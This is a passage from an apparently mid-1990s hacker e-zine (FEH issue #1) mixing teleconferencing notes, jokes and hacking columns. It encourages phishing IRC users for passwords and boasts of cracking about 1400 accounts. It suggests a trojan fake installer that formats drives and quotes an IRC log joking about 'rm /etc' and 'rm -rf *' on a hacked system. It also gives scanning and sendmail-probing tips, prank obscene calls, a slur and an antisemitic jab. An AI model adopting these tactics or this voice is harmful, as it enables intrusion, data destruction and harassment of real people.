  754. XXXX [ (Notes) ] : [ He writes books  ]
  755. ========================== ============
  756.  
  757. This is certainly *not* a screen capture, so the screen the operator will see
  758. is very probably more  complex. Also the Fields represent variable areas, you
  759. probably get a  better  idea of what the operator is thinking when talking to
  760. you through this.
  761. [ed note: the operator is probably thinking about how her life ended up
  762.           so miserably that she is working as a telephone operator.]
  763.  
  764. Billing  status  can include a refuse notice for delayed payment or whatever.
  765. The Notes can  be preferences, such as toll free access or possibly something
  766. else. Callback  confirmation  is  usually not utilized, since the bill is not
  767. included with the  phone  bill, but is delivered to the billing address. Your 
  768. number appears  on their terminal  also,  with whatever comments are attached
  769. to that.
  770.  
  771. American has become so exclusively  dedicated  to  serving IBM that operators
  772. will sometimes get on and  say "IBM Conference Service." I also spoke to some 
  773. operators about what software they were running and on what type of terminals
  774. which appears to be a big secret.  [ed note: probably NOT os/2]
  775. EDICTS: Electronic Distribution Information  Control Transaction System, file 
  776. transfer  system. Operates RO6000 Systems. Distributed by IBM. This is one of
  777. the programs used by American, the operator told me that much before she woke
  778. up a bit. This is a datacommunications software package, and is seperate from
  779. their audio / video teleconferencing software.
  780.  
  781. ----------------------------------
  782.  TiNet, TiLines, and TiSystems
  783. ----------------------------------
  784.  
  785. TiNet dialins do not exist. The only  way to access TiNet Services is through
  786. IBM's phone system. TiNet is simply the  telephone system IBM strung together
  787. which makes conferencing and interoffice communications easier.
  788.  
  789. In fact, TiNet was  created as a datacommunications system that ended up with
  790. a gross excess of bandwith so they expanded  into Voice Capabilities. TiLines
  791. can be setup in virtually any office, and for any large bussiness.
  792.  
  793. Tinet's selling feature, so to  speak, is that offices with TiLines installed
  794. can bypass long distance  charges and  Telephone Companies all together. This
  795. is particularly  useful  for Banks and  Credit Unions who prefer the Security
  796. of private phone lines than the inherent lack of security in public / normal
  797. phone lines. [ed note: what about clipper?]
  798.  
  799. In conclusion I would  like to state that all of the information mentioned is
  800. for purely  informational  purposes and that, should any of you abuse IBM and
  801. American Teleconferencing, that would be illegal and you would be prosecuted.
  802. But then again, would any of us choose to break the law? Heavens no! 
  803. [ed note: if you do happen to break the law, drop us a note so we know that
  804.           this is useful.]
  805.  
  806. -------------------------
  807.  Fun Filled Numbers
  808. -------------------------
  809.  
  810.  IBM Software Information Service == 1-800-426-2255
  811.  IBM General Information Line == 1-800-426-3333
  812.  American Teleconference Reservation Line == 1-800-723-9093
  813.  Hooked on Phonics main order Line == 1-800-222-3334
  814.  IBM CORP main office [Philadelphia] == 215-851-2008
  815.  IBM Teleconference Director's office [Philadelphia] = 215-851-3677
  816.  
  817. The author's inpho:
  818. Morpheus can be reached at GBA 215-750-0392 or morph@chewy.wookie.net or
  819. morph@iia2.org.  Send your public pgp key if you want a reply.  Also,
  820. you can reach him at 800/862-0094 during the day from US, or from canada,
  821. 800/925-9999 ## 719.  On EFnet, he's on #hack, #zines, and #cafbl.
  822. -----BEGIN PGP PUBLIC KEY BLOCK-----
  823. Version: 2.3a
  824. mQCNAi/R9UAAAAEEALDNmlPQJ/CmH1Ba77TmMKBaW6zUUcTrFuOe5duBZvyQpkGR
  825. frHppvXbTXHB3jm4jHL9kCueo1IJGXfOTC4lyI/rGBr731NdwFYlsdeWh5Ampvj0
  826. YKchVh5mp7glTQYS/rtARupXlb/H2X+wY5JgsJK1dFQJ3QfyA2bQA34kJ66RAAUR
  827. tB9Nb3JwaGV1cyBLTCA8bW9ycGhAaXhjLml4Yy5uZXQ+
  828. =SrJR
  829. -----END PGP PUBLIC KEY BLOCK-----
  830.  
  831.  
  832.  
  833. // 9.  How to amuse yourself by Rush2 
  834. [ed note: this is what people that are not FEH might try]
  835.  
  836. 1. The Michael scam.  One day a few days ago I got very very bored. I said 
  837.  what the hell. I bet I can get a lamer to give me his/her password. I
  838.  thought of the most common name, michael, and changed my irc nick to .. DUH
  839.  Michael.. within 10 minutes someone had mistaken me for her best friend 
  840.  michael..  she thanked me for somethign about hooking her up with alliance
  841.  not the service, some guy.  I bullshitted for 10 minutes, then really panick
  842.  y like "Oh crap I just screwed up my account.. majorly would you gime your 
  843.  login and password pleaseeeee".  Wellshe was that stupid and she gave it to
  844.  me. I really wanted to know if anyone else was that stupid.  I tried a lot
  845.  of common names for the next 2 hours, john, mike, larry etc..etc.. I 
  846.  succeeded wiht 99% of my attempts, I got 19, failed once. SO do something
  847.  like this if you are REALLY bored. 
  848. [ed note: a bottle of scotch is far more effective than this] 
  849.  
  850. 2. Trade passwd files.. hehe... when your bored change yer name on irc,
  851.  go into #Hack see if you dont get kicked off and ask for passwd files..
  852.  [ed note: if you don't get kicked off, hurt everyone that was opped] 
  853.  if you are really bored this can be fun and you can get some new systems
  854.  to get in.. now unless your someone that is cracking them just to get as 
  855.  many accounts as you can (I feel hypocritical currently I have 1400 valid
  856.  accounts on this local provider, on my computer upstairs (in just one day 
  857.  YES people in my area have easy passwds.. only a 1mb file (AND just with 
  858.  login name I got 300 yesterday.. haha I) And I am hearing a lot of beeps
  859.  (root was the first cracked account:).. this is something to do if you
  860.  feel bored and lame...
  861. [ed note: mail the cracked password file to cert@cert.org and you win a prize]
  862.  
  863. 3. Write really nifty little utils in quick basic (if your still stuck
  864.  on a dos box)... nothing is niftier than writing a shitty program in
  865.  qbasic that uses a captured installation display screen from a game 
  866.  or something (or modify it to say mortal combat 3 or soemthing, the little
  867.  warez kids cum from this) and really make it format their drive... yes this
  868.  is lame but you KNOW we all get this bored at one time or another in our 
  869.  lives.
  870. [ed note: Super Street Fighter is more Fuxin' Eleet] 
  871.  
  872. 4. Use Irc.  Yes this is the lamest of the lame.  #hack.  Where ignorance is
  873.  shown and knowledge forgotten.  If you want immaturity, brattiness, kids
  874.  playing with their krad bots or scripts, or your typical op wars, go to #hack,
  875.  #phreak, #2600, or my <coughcoughnotcoughcoug> favorite, #ansi.  Yes #ansi
  876.  people with any intelligence know it is american national standards institute,
  877.  dorky little kids that have no life (we have no lives either but we arent 
  878.  little kids ... we are middle kids.. ?) [ed note: if anyone can figure out
  879.  what the hell he is talking about, email me] think it is an art form and a way
  880.  for them to be cool... their idea of coolness is being worshipped by pervert
  881.  ed, immature, talentless, dweebs with pcs.. most of these peopel are aol
  882.  and prodigy rejects... ...anyways... this is something to do when you are 
  883.  SUICIDALLY bored.
  884. [ed note: actually suicide might be a better solution]
  885.  
  886. 5. Get on one off those cracked accounts (see number 1) and type something 
  887.  like archie -s a > hackedpws.k00l  or archie -s . > HEY.YOU.STUPID.SYSADMIN.
  888.  BLOW.ME (that is sure to get his attention).  If you are really bored, you 
  889.  can edit their .login to cat the file when they login (this being archying <
  890.  sp> a or . will probably give you a few thousand file names and if the owner
  891.  of the account can even login (they havent checked user quotas yet obviously)
  892.  so that they must wait an hour for the thing to finish (but I'm not sure it 
  893.  never has for me because i just telnet), it may just flood their com ports 
  894.  (or if you have root, do archie -s a, archie -s ., archie -s (whatever you 
  895.  want to to get a LOT of entries) > motd or >.login and make it so EVERY
  896.  ONE sees this when they login...  unless they are on like a 2400... 
  897.  This is something to do when your bored...
  898. [ed note: do I notice a trend forming?]
  899.  
  900. 6. Go onto Irc, and into #hack and let ReDragon convince you to write an
  901.  article for some magazine (JUST ANY ARTICLE) .. and spend the next (however
  902.  much time I spend on th) writing an article filled with strange and useless
  903.  dribble because you are too lazy to do a real article.. *WARNING* *WARNING*
  904.  DO THIS IN ONLY EXTREME EMERGENCIES *WARNING* *WARNING*
  905. [ed note: 6.  go onto irc, randomly msg someone you don't know to see just
  906.               how lame an article someone who is not FEH can write.]
  907.  
  908. 7. Ftp to rs0.internic.net and retr all of the domain name lists. Spend
  909.  the next four or five hours reading the com.zon file and jack off to the
  910.  point of orgasm to it .. NO I AM NOT PATHETIC, YOU DO IT TO YOU JUST REFUSE
  911.  TO ADMIT TO IT. Do this all the time ... .this doesnt mean your bored, you
  912.  are just creative.
  913. [ed note: you are just an idiot]
  914.  
  915. 8. Call up the local noq and say things like 
  916. [ed note: I wish I knew what a noq was]
  917.         "Do you Deliver?"
  918.         "Yeah, I'll have a pair on rye, hold the mayo"
  919.         "Umm yes is this the roadkill cafe? I just hit some guy with a Bell 
  920.         (or whatever your local telco is) Helmet and I think he would be tasty
  921.         charred"
  922.         "Hey baby what are you wearing?"
  923.         "Are you wet?"
  924.         "I've got a big phat pole ready for ya.. standing straight up just
  925.         for you"
  926.         Tape record them... turn them into .wavs or .aus and put them on your
  927.         home page... this is something to do when your bored or when you are
  928.         PATHETICALLY bored (YES I mean if your on a teleconference).
  929.  
  930. 9. Hack your school's net and make i automatically go to modem doom everytime
  931.  someone clicks the left mouse button (hey its fun and it was only ONE of the
  932.  reasons I had a remark "DANGER TO COMPUTERS" in my entry in my school's 
  933.  computer so it is pretty kosher
  934.  
  935. 10. SPELL CHECK this fucking article because I'M NOT GOING TO.
  936.  
  937. 11. If you have www access go to some of the following sites:
  938.         http://www.oceania.org | a brilliant scientific endeavor to create
  939.         a new, truely democratic society on a synthetically made island.
  940.         http://www.smallpenis.org | for those people afraid of being less of 
  941.         man.. they have support groups AND penis pumps!!!!
  942.         http://www.wookie.net/l0ra | A ... home page (no comments .. hehe)
  943.         http://www.something.org | A really cool site but I cant remember the
  944.         url so i wont put it here.. im sure you will find it 
  945.  
  946. [ed note: 12 was too lame for even FEH to print]
  947.  
  948. 13. Watch tv.  Scary huh?
  949. 14. Irc and go to #netsex as ILLFUCKU. notice the channel that you want some
  950.  one for phone sex. see if you get kicked or invitations. heheh.
  951. 15. Read this file (you must be bored d00d).
  952. [ed note: if you search for //, you will find the start of the next article]
  953. 16. See how many of these things I type.
  954. [ed note: hint, then answer is 18]
  955. 17. Add another to your count.(see previous item)
  956. 18. EOF
  957.         YEAH IT WAS LAME.. YEAH IT SUCKED.. YEAH IM TYPING IN ALL CAPS.. SO 
  958.         WHAT?..  I WAS BORED... ARE YOU SATISFIED rEdRAGON???? ( :) )
  959. [ed note: pretty much]
  960.  
  961.  
  962.  
  963. // 10.  The Infamous Tack Story by Hotrod
  964.  
  965. The story you are about to hear, it has been determined, has been spread 
  966. by word of mouth to at least 5 states, and parts of Canada.  Whereever I 
  967. go, people who I have never seen before ask me about the tack story. I   
  968. have no idea why this is the case - the story might have been funny once,
  969. but I'm really rather sick of it.  My friends (and apparantly these 
  970. people I don't know, who ask me about it) think this story is the 
  971. funniest thing they've ever heard.  I think they are nuts.
  972.  
  973. The following story is 100% true.
  974. Dramatis Personae:
  975. Myself (Hotrod)
  976. Chris, A friend
  977. Zafir, An acquaintance
  978. [ed note: is he the pan flute dude?]
  979.  
  980. The Setting:
  981. Junior High School, Massachusetts.
  982. Lunchtime, 8th grade
  983.  
  984. Ok, here goes.  It was a normal lunchtime, really.  I had gotten in line 
  985. to get the "Hot Lunch", which is the generic, "nutritionally balanced" 
  986. meal.  On this fateful day, the hot lunch was manicotti with meat sauce.
  987. A kid I knew, and had no reason to distrust, came up to me while I was in 
  988. line and offered to sell me his hot lunch, without the milk. (Milk came 
  989. with the hot lunch.)  Of course, I'm thinking to myself "This kid must be 
  990. stupid.  He wants to sell me his hot lunch, which costs $1.30, for 50 
  991. cents, while keeping his milk, which he could have bought for 35 cents by 
  992. itself. [ed note: a savings of -45 cents]  I did know that this kid WAS
  993. stupid, however.  So I bought the lunch and went to sit where I always sat,
  994. next to my friend Chris. [ed note: not erikb]
  995. For a few minutes, everything was fine.  I was eating and enjoying (as 
  996. much as one can enjoy a school lunch, anyhow) my manicotti.  Keep in 
  997. mind, that manicotti is soft, it's something like lasagna.  [ed note:
  998. i hope nobody from Italy is reading this]  You don't really chew it a whole
  999. lot, you just squish it around in your mouth and swallow.  Then it happened. 
  1000. I put the manicotti into my mouth.  [ed note: that's not the climax of the
  1001. story, he in fact put many pieces of manicotti in his mouth that day]  I
  1002. squished.  I swallowed.  I grunted.  I yelled. Something Sharp!
  1003. Words that will live in infamy in the minds of my friends.
  1004. [ed note: the words 'huuhuhuhhuhu' also live in infamy to his friends]
  1005. The dialogue went like this:
  1006. Me: [In a very hoarse voice]  "Argh@!#  Something Sharp!  Something sharp 
  1007.                                in my throat!" 
  1008. Chris: "What?" [ed note: still not goggans]
  1009. Me: "Argh it kills!"
  1010. Chris: "What is it?" [ed note: this time it is erikb saying it]
  1011. Me: [Grabbing Chris' chocolate milk and taking a swig] "I can feel it 
  1012. like grinding down my throat.. You know when you get like the sharp 
  1013. corner of a Dorito or something?  God it kills!  It feels like a staple 
  1014. or a tack or something!"
  1015. Chris: [Laughing a bit] "A tack?  Zafir probably put a tack in it!"
  1016. [ed note: being a minor, Zafir was out of jail on his 18th birthday] 
  1017.  
  1018. Anyhow, thats about it.  It hurt going down.  It never hurt again.
  1019. To the best of my knowledge, I have not shit out the 'tack'.  No proof has
  1020. ever been found that there was a tack in my manicotti, [ed note: manicotti
  1021. in general should not hurt to swallow] although Chris swears that he talked to 
  1022. Zafir, and Zafir admitted to it.  I think Zafir has since been deported.  
  1023. I hope so, anyhow.  Should I ever shit the tack out, it will be so noted in
  1024. a future issue of FEH. [ed note: I have a pencil end in my right shoulder]
  1025.  
  1026.  
  1027.  
  1028. // 11. The Birth of FEH by SnoCrash
  1029.  
  1030. So ReDragon /msg's me today.  He goes "write the history of FEH befor
  1031. midnight tonight" (not in those exact words, and in all caps n stuph,
  1032. but you get the point). 
  1033.  
  1034.           fEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEh
  1035.        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1036.           ThE HiStOrY Of FeH -- PaRt 1 <<ThE BeGiNnInG>>
  1037.               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1038.                    (FuXiN' ElEeT HaXoRs)
  1039.             A BeDtImE TaLe By Da MaStUr Of DiSaStUr:
  1040.                       SnOcRaSh
  1041. Okay, enough with this AlTeRnAtInG CaPs crap.  It makes my head hurt.
  1042. [ed note: my feelings exactly]
  1043. (DISCLAIMER: FOR ALL YOU KNOW, NONE OF THIS COULD BE TRUE.  I AM TRYING TO
  1044. REMEMBER WHAT HAPPENED AND MY MEMORY SUCKS AND I EXAGGERATE SO DEAL WITH IT)
  1045. Well, it all started for me about a year ago.  I was bored shitless as usual
  1046. on a Sunday morning, and was checking out <name witheld>.edu.  I had an
  1047. IRC window open as well, as I almost always do.  Here's the log from that
  1048. fateful day (re-formatted a bit to make it more readable):
  1049. [ed note: whenever monumental history takes place on #hack, log it]
  1050.  
  1051. <SnoCrash>     i found a system that still has the ftp -n bug!!!!!
  1052. <ReDragon>     sunday afternoon is warez ftping days
  1053. [ed note: being as this was a sunday, ReD was probably still a bit drunk]
  1054. <SnoCrash>     holy shit!!!
  1055. <SnoCrash>     i feel sorry for the sysop
  1056. <SnoCrash>     i'm gunna mail him and tell him
  1057. <SnoCrash>     this is sad
  1058. <noxit>     last root i haqued
  1059. <noxit>     i left mail describing how to do it and how to fix it
  1060. <noxit>     sad
  1061. <ReDragon>     haha
  1062. <Okinawa>     noxit; not me, I just rm /etc and let them figure it out
  1063. <SnoCrash>     rm -rf *
  1064. <SnoCrash>     ha
  1065. <SnoCrash>     lame
  1066. <SnoCrash>     well...
  1067. <SnoCrash>     what should I do
  1068. <Okinawa>     no, not /* but just /etc
  1069. <SnoCrash>     im gunna change the banner explaining what to do
  1070. <Okinawa>     Were all the configs are ;)
  1071. <ReDragon>     if you dont rm the site, they will never learn how dangerous
  1072.                 hackers can be and the importance of securing their site
  1073. <SnoCrash>     Oki: i know
  1074. <SnoCrash>     and rm every user
  1075. <SnoCrash>     there's only 10 users
  1076. <Okinawa>     put in the l0ck motd
  1077. <oof>         red: gimme warez
  1078. [ed note: note oof's critical role in FEH's inception]
  1079. <SnoCrash>     they all have empty home dirs anyway
  1080. <Okinawa>     put in a ILF motd
  1081. <SnoCrash>     cept for the standard shell shit
  1082. <ReDragon>     oof: whatcha want
  1083. <ReDragon>     put in a FEH motd    <-- the first public mention of FEH
  1084. <noxit>     ln -s /vmunix /etc/motd
  1085. <rS-449>     noxit: haha
  1086. <loq>     oki: if you rm /etc, where are ya gonna put the ILF motd?
  1087. <Okinawa>     is there a FEH motd?
  1088. <grayarea>     donut put in an ilf motd :)
  1089. <oof>         red: i dunno
  1090. <grayarea>     use feh :)
  1091. <SnoCrash>     yeah
  1092. <ReDragon>     i will release an official FEH motd later today
  1093. <SnoCrash>     feh
  1094. <Okinawa>     loq: true
  1095. <SnoCrash>     I'll make up a temp one now
  1096. <Okinawa>     grayarea: why not?
  1097. <SnoCrash>     **Hacked by a FEHWB**
  1098. <SnoCrash>     ha
  1099. <grayarea>     cuz they r in my new issue and if anything is done in their
  1100.                 name i will be visited
  1101. <loq>         gray: dont you like being visited?
  1102. <loq>         :)
  1103. <noxit>     "visited"
  1104. <noxit>     aliens of phedz?
  1105. <grayarea>     and #hack has caused me more than enuf contact with feds for
  1106.                 the year already :)
  1107. <noxit>     s/of/or
  1108. <grayarea>     loq: i hear they come at dawn. ewwww
  1109. <grayarea>     loq: i prefer evening appointments
  1110. <loq>         heh
  1111. <SnoCrash>     if I put up a FEH motd, can I be a FEH?
  1112. <loq>         mine come at 11pm
  1113. <ReDragon>     Sco: you already are in FEH you moron
  1114. <SnoCrash>     oh yea
  1115. [ed note: i actually said Sco, not sno... but he never realized it]
  1116.  
  1117. So there it was.  I was in FEH. 
  1118. I made a temporary FEH /etc/motd, call it FEH motd version .0000001b.
  1119. Here is how it looked:
  1120. ---------HI!!! WELCOME TO <name witheld>, NOW OWNED BY FEH----------
  1121. [TODAY'S NEWS]
  1122. Your system has been hacked by a member of FEH... Fuxin Eleet Haxors.
  1123. I am not particularly proud of this hack because it exploited an extremely
  1124. old bug that was patched many years ago. I have left a file in the root
  1125. directory called "how.to.fix.the.bugs.you.have" please read it and follow the
  1126. directions in it on how to fix the bugs you have. I am very sure that your
  1127. system has many bugs, judging from this and the version of sendmail you are
  1128. running.  Thank you for your time...
  1129. --- Anonymous member of FEH who just fuxored up your system real bad
  1130. Not exactly beautiful, but it worked for the site it was placed on.  
  1131. ReD then created the FEH motd versions 1.0 and 1.1, which is located in this
  1132. issue within the wopr hack.
  1133. [ed note:  oof never got his warez, if you have any, please send him some] 
  1134.  
  1135.  
  1136.  
  1137. // 12.  An Interview with Dale Drew by ReDragon
  1138. [ed note: good to my word, this is completely unedited for content, only
  1139. for formatting.]   
  1140.  
  1141.  
  1142. ReD:  will you do an interview for FEH issue #1?
  1143. d_d:  I dont do interviews, sorry
  1144. ReD:  just this once dale.  only a few questions
  1145. ReD:  its not like you've NEVER done an interview
  1146. ReD:  dont even think of it as an interview, think of it as just
  1147.       answering a few questions where the answers get published
  1148. d_d:  haha.. and the difference is?
  1149. ReD:  well, you dont do interviews.  but maybe you do published question
  1150.       and answer sessions.
  1151. ReD:  so why dont you do interviews?
  1152. d_d:  Youve got better things to do than interview me
  1153. ReD:  when you let me interview you, you keep me out of trouble :)
  1154. ReD:  so why dont you do interviews?
  1155. ReD:  well
  1156. d_d:  too many misquotes
  1157. ReD:  pleez
  1158. ReD:  i am not going to misquote you
  1159. ReD:  so will you answer just a few questions for me
  1160. d_d:  depends on the questions
  1161. ReD:  are there any hackers that you particularly like or dislike?
  1162. d_d:  No.
  1163. ReD:  Do you think the people you are trying to bust care about learning  
  1164.       about the phone system or are they just trying to make free phone
  1165.       calls?
  1166. d_d:  There are to many LEGAL ways to learn about phone systems these days
  1167.       to put up with fraud.
  1168. ReD:  So do you think 10 or 20 years ago some phreaking may have been 
  1169.       justified in order to learn?
  1170. d_d:  I never think that committing fraud is a justifiable way to learn
  1171.       anything.
  1172. ReD:  Does it cost your company anything when a person makes a free phone call?
  1173. d_d:  Making use of a service illegally that would otherwise be billed
  1174.       for certainly costs the company money
  1175. ReD:  I understand there is a loss of income from the consumer since they are
  1176.       not paying, but is there any expense to the phone company for that call
  1177.       and if so can you estimate the cost?
  1178. d_d:  I am not in phone fraud, so I wouldnt be able to estimate
  1179. ReD:  So what is your job description?
  1180. d_d:  Data Security
  1181. ReD:  Can you expand on what that encompasses?
  1182. d_d:  Later.. Ill be back
  1183. ReD:  do you know when?
  1184. <d_d drops connection>
  1185.  
  1186.  
  1187.  
  1188. // 13.  "Hacking Made Easy Using Scripts" by Seven Eleven
  1189.  
  1190. HacK1nG Mad3 EZ Uz1Ng Skr1PtZ    Part I  by Seven Eleven (711@sec.de)
  1191. =======================================
  1192.  
  1193. Welcome to our new column, dear reader.
  1194.  
  1195. In the software industry, everything is getting easier - 
  1196. easier to use, easier to handle. The keywords are "Plug and Play",
  1197. the new WinDos 95 and "Don't think but drive (on the information
  1198. superhighway)".
  1199.  
  1200. Now everyone can get on the Internet, your grandfather, your 4 year old sister
  1201. and even a coffee machine in Cambridge. There is no need to be smart,
  1202. no need to know anything about computers, and no need to have a brain.
  1203.  
  1204. With more and more people on the net, more and more want to play
  1205. around and learn about other systems by getting into them, formerly
  1206. called "Hacking".
  1207.  
  1208. To make those tries possible, we are bringing you easy to use and always 
  1209. working step by step instructions and scripts!
  1210.  
  1211. There are 3 major steps to succeed, which are similar to hitting
  1212. on a girl:
  1213.  
  1214. 1) Get a list of all visible targets
  1215. 2) Check if there is an easy way of scoring
  1216. 3) Try gettin' into!
  1217.  
  1218. Today we will take a look at 1) and 2). 3) will follow in the next issue.
  1219.  
  1220. Since all most newsbies know about is IRC, we will try to get a list
  1221. of visible targets through IRC!
  1222.  
  1223. Here is our great script:
  1224.  
  1225. ------------------ cut here --------------------------- cut here --------
  1226.  
  1227. # IRC Host Leecher 1.0 by Seven Eleven (711@sec.de)
  1228. #
  1229. # This little one liner gets you all hosts that are currently on IRC
  1230. # and sorts the output nicely.
  1231. #
  1232. # This is especially nice if you plan to use our Host Checker.
  1233. #
  1234. #
  1235. # All you have to do is this:
  1236. #
  1237. # Start IRC
  1238. # /SET LOGFILE rawhosts
  1239. # /SET LOG ON
  1240. # /WHO **
  1241. # /SET LOG OFF
  1242. # /QUIT
  1243. # $ <Name_of_this_Script> rawhosts > outputfile
  1244. #
  1245. # Have Fun! :-)
  1246. #
  1247. #
  1248. #!/bin/sh
  1249. cat $1 | awk '{print $4}' | awk -F@ '{print $2}' | sort | uniq
  1250.  
  1251.  
  1252. ------------ cut here --------------------- cut here --------------------
  1253.  
  1254.  
  1255. Also try to use an old or modified server that won't kill you when you
  1256. list too many names! It used to be easier some months ago, but you should
  1257. still be lucky! After all, it's good if not too many Lamers get as far
  1258. as you, isn't it? :-)
  1259.  
  1260. If everything went fine, you have a wonderfully nice list of hostnames.
  1261.  
  1262. If you want to do it the elite way, try writing your own elite script,
  1263. executing a command with each of the hostnames. Possibilities include:
  1264.  
  1265. - Check with rpcinfo -p which services are available. 
  1266.   Some might be vulnerable!
  1267.  
  1268. - One vulnerable daemon is mountd. Figure out yourself how to probe it!
  1269.   (First Exercise!)
  1270.  
  1271. - Use ypx or ypsnarf to test their ypserver's security. If it's open,
  1272.   either get in or --> social engineer the admin by telling him bugs (lame!)
  1273.  
  1274. - Check with the 31337 SATAN!@# (available at a WaR3z near you!)
  1275.  
  1276. - Try some sendmail bugs.
  1277.  
  1278.  
  1279. If the above ways sound to hard for you, do it the easy way.
  1280. Social engineer the administrators!
  1281.  
  1282. - Sending mail to root@hostname requesting for an account
  1283.   (Be prepared for many flames and your old account to be shut down)
  1284.  
  1285.  
  1286. If you should surprisingly be successful, drop me a mail and tell
  1287. me about your story! If not, stay tuned for the next issue of...
  1288. HacK1nG Mad3 EZ Uz1Ng Skr1PtZ!@#
  1289.  
  1290.  
  1291.  
  1292. // 14.  How to Hack A Toaster Oven by bl0ke
  1293.  
  1294.  
  1295. HacKZoRiNG Ah ToaSTeR OOOHHVeNN)#(*%)(*%
  1296. ========================================
  1297. Author:
  1298.   bl0ke:#$%HS@#H:dat niggah bl0ke:/home/bl0ke:/bin/tcsh
  1299. (k)opywr0ngeded 1995
  1300.  
  1301.  
  1302. +--------------------------------------------------------------+
  1303. | [=ThiS iS THu DEFiNITiVE GuIDE TeW HAxORiNG A ToaSTER)#(%*=] |
  1304. +--------------------------------------------------------------+
  1305. ****************************************************************
  1306. *******The Author of this text takes no responsibility for the**
  1307. *******actions that are performed on toaster ovens to try and***
  1308. *******obtain an access which the superuser does not want a ****
  1309. *******regular (l)user to have access to.***********************
  1310. *******The author also notes that this text is allowed only*****
  1311. *******to be used as a .motd after the site has been hax0red.***
  1312. ****************************************************************
  1313.  
  1314. ^^^--------NoTiCE MuH DOpE K-RAD KiLLa AK-AkII SKeeiLLZ()*#$
  1315.  
  1316.  
  1317. /* 
  1318.  
  1319.    This text covers the basics of hacking the Proctor & Silex
  1320.    MoDEL:0225 SERiES:b4588 TyPe:02
  1321.  
  1322.    This specific toaster handels 120 Volts A.C. *ONLY* 1400 WATTS
  1323.  
  1324. */
  1325.  
  1326. CoNNECTiNG:
  1327. -----------
  1328.  
  1329.   When CoNNECTiNG TeW SuCH A ToaSTER On ThU iNeT YeW WiLL b ProMPtED
  1330.   4 aH LoGiN AnD PaSSwErD.  ex:(This is a capture of a login.)
  1331.  
  1332.  
  1333.  
  1334. +-------------------+
  1335. | PROCTOR & SILEX   |
  1336. | M:0225            |
  1337. | S:b4588           |
  1338. | T:02              |
  1339. +-------------------+
  1340.  
  1341.  
  1342. LaHGiN:bageL-n-KreAM/CheZE
  1343. PaSSWeRD:*************************************
  1344.  
  1345.  
  1346. LaHGiNN GRaNTiD
  1347. ***************  
  1348. ------------------------------------------------------------
  1349.  
  1350. P&S VeRSiON 666.9.MuRRY_LenDER(*REVISION*)
  1351.  
  1352. ------------------------------------------------------------
  1353.  
  1354. login on tty[tOaST]
  1355. last login from BAGeL_BaKERY.COM on tty[ChEZe] at 6:43a.m.
  1356.  
  1357. :/etc/motd not found
  1358.  
  1359.  
  1360. 1: OFF
  1361. 2: ToAsT StART
  1362. 3: BRoWN
  1363. 4: BuRNT
  1364. 5: LiGHT
  1365. 6: UNiX TyPE SheLL ENViRONMEnT
  1366.  
  1367.  
  1368.  
  1369.  
  1370.   If YeW GhET THiS YEW ArE COOL)(#*$  Ok NoW CHEwZe No. SiX.  AND RuN NE
  1371.   Of ThU 8LGMz.  They WeRK.  DeW NoT WeRRIE BoUT WhUT THU 8lgM SaYZ iT
  1372.   WiLL STiLL WeRK oN ThIS SYSTEM.  AlLLL THu 8LGMz DeW()#*%&(  ThE OtHER
  1373.   CoMMANDs R NoT ImPOrTaNT.
  1374.  
  1375.   SoME NeaT-O ThINGS.  YeW CaN TaP the /dev/ToaST-N-CheEZe.  YeW CaN FiND
  1376.   A FeW PRoGRAMs ThAT ArE GeWD FeR ThIS SuCH SYTeMM.
  1377.  
  1378. ftp:ftp.elite.warez.feh.OrG
  1379.  
  1380. /pub/hax0ring_WaReZ/ToAsteR_HaxoRiNG_WaREZ
  1381.  
  1382. P&S_ToAsTeR_ReWTKiT.TaR.GZ            -RooTKiT FeR ThiS TYPE o ToaSTER
  1383. PSNiFF.GZ                             -/dev/ToasT-N-CheEZe SniFFAH
  1384.  
  1385.  
  1386. SoME DeFUlTZ:
  1387. Login:Password
  1388. ++++++++++++++
  1389. bageL-n-KreAM/CheZE:YuMMY
  1390. PoPALeNDER:STiNKY_Joo
  1391. POaCHeD_EGZ:HooKGNOZe
  1392. root:root
  1393. lpd:lpd
  1394. guest:hymienotyew
  1395.  
  1396.  
  1397. +======================================================================+
  1398.  
  1399. ThIS CoNCLuDES ThU DoPEST ARTiCLE On THu FACe O ThU PlaNET)(#*%)(*%
  1400. I WooD LiKE TeW GREaT:
  1401. Murray_L of the BagelBoyz o HymieTowN.
  1402. BuRnT-T of The BuRNT ToasT PoSSE.
  1403. AnD ReDRAGoN N ShIT.
  1404.  
  1405. PeSE OuT 
  1406.  
  1407.  
  1408.  
  1409.  
  1410. And on that uplifting note, the first issue of FEH is complete....
  1411. Thanks for reading.
  1412.   
  1413.                                         - FEH
  1414.  
  1415.